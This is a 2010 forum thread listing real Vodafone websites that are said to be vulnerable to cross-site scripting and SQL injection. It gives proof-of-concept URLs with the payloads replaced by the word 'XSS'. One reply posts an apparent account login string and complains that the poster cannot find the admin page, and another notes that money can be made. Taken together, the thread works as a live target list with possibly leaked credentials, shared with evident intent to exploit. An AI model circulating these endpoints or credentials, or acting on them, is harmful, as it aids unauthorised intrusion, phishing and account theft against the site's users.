begood Posted September 29, 2010 Report Posted September 29, 2010 Several Vodafone sites vulnerables to XSS flaws, could aid phishing attacks Vodafone.com , Vodafone.ro , Vodafone.com.tr , Vodafone.com.au , Vodafone.es , Vodafone.it , Vodafone.gr , Vodafone.ie , Vodafone.in , Vodafone.de , Vodafone.co.uk Proof of concept: https://www.vodafone.ro/mydomain/shop/voda.signup.cgi?pageid=print_moreinfo&id=XSShttp://runners.vodafone.com/wp-content/plugins/post-star-rating/psr-ajax-stars.php?p=XSShttps://wlan.net.vodafone.it/vfile/pwlan/pages/otp/login_partner.jsp?LoginURL=login.linkem.com/sd/login&AccessLocation=isocc=it,cc=39,ac=06,network=linkem&LogoffURL=x&LocationName=XSShttps://club2020.mi.vodafone.es/rascaygana/mailing/mail_alta.php?telefono_encriptado=XSSVodafone Handyfinder 2.1XSShttp://portal.vodafone.gr/vodafonenet/register/newRegister/holSSOlogin.jsp?action2=XSShttp://live.vodafone.com.tr/galleryimages/watch.php?url=http://live.vodafone.com.tr/galleryimages/rockncoke/videos/rnc_video_03.flv&keepThis=true&TB_iframe=true&height=XSSQLD Coverage MapXSSSearch Results for:XSSControl PanelXSSAnd SQL Injection on http://mediacentre.vodafone.co.ukPoc:Vodafone Media HubSQL Injectionxss works also! All proof of concept still works,Be careful !Security-Shell: Several Vodafone sites vulnerables to XSS Quote
boradarius Posted September 29, 2010 Report Posted September 29, 2010 https://online.vodafone.co.ukvodafone-vfmrc2010kevin@flowdigital.com-vfmrcdar nu gasesc pagina de admin Quote
Guest User Name Posted September 29, 2010 Report Posted September 29, 2010 good job,thks! Se pot face bani... Quote